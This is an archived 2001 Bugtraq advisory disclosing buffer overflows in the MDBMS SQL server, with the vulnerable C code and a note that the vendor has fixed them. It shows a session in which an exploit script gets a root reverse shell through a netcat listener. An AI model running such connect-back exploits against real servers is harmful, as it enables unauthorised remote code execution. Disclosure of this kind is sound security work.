Dear bugtraq readers, MDBMS is a SQL database server (currently) for UNIX systems. Version 0.99b9 and below versions contain an exploitable buffer overflow in the handling of the \s console command. When a user passes large buffers to the server in the form of multiple lines, these are appended to the end of each other. A subsequent call to the \s command causes the overflow. Below is faulty code (from interface.cc): void user::uprintf(char *s, ...) { char b[10000]; int len=strlen(outbuf), newlen; va_list ap; va_start(ap,s); vsprintf(b,s,ap); <---- va_end(ap); newlen=strlen(b); while (newlen+len+10>=outsize) outbuf=(char*)realloc(outbuf,outsize+=1000); strcat(outbuf,b); FD_SET(fd,&parent->wmask); } mu-b also found a buffer overflow in the "create database" system. This was actually caused by a sprintf that generated the name of the management variable. This has been fixed - now table and database names can no longer be larger than 128 bytes. Information about the overflows was sent to martyat_private He has now fixed the problems, and new versions of MDBMS can be found at: http://www.hinttech.com/mdbms/ We would like to thank Marty for kind response and quick update. Exploit example: ---------------- [teleh0r@localhost mdbms]$ ./mdbms-pms.pl -- Remote code execution exploit - MDBMS <= 0.99b -- <teleh0r@digit-labs.org> - Copyright (c) 2001 Usage: ./mdbms-pms.pl -t <hostname> -b <back> -t <hostname> : hostname to test -b <back> : connect back to ip -p <port> : port (default: 2223) -d <delay> : delay before timeout -o <offset> : offset -h : return to heap [teleh0r@localhost mdbms]$ nc -l -v -p 1337 & [1] 2070 listening on [any] 1337 ... [teleh0r@localhost mdbms]$ ./mdbms-pms.pl -t 127.1 -b localhost -h -- Remote code execution exploit - MDBMS <= 0.99b -- <teleh0r@digit-labs.org> - Copyright (c) 2001 -> Connected to: 127.1 / MDBMS V0.99b9 ready. -> Address : 0x302027d / xor-mask: 0x2020202 -> Return : 0x80cfe76 / using the heap ... -> Sending payload: ... -> * Successfully sent payload - good luck! connect to [127.0.0.1] from localhost.localdomain [127.0.0.1] 1189 [teleh0r@localhost mdbms]$ % nc -l -v -p 1337 whoami; uname -mnrsp root Linux localhost.localdomain 2.4.2-2 i686 unknown ... Exploit code attached. Sincerely yours, teleh0r and mu-b -- To avoid criticism, do nothing, say nothing, be nothing. -- Elbert Hubbard
This archive was generated by hypermail 2b30 : Wed Jun 13 2001 - 15:03:10 PDT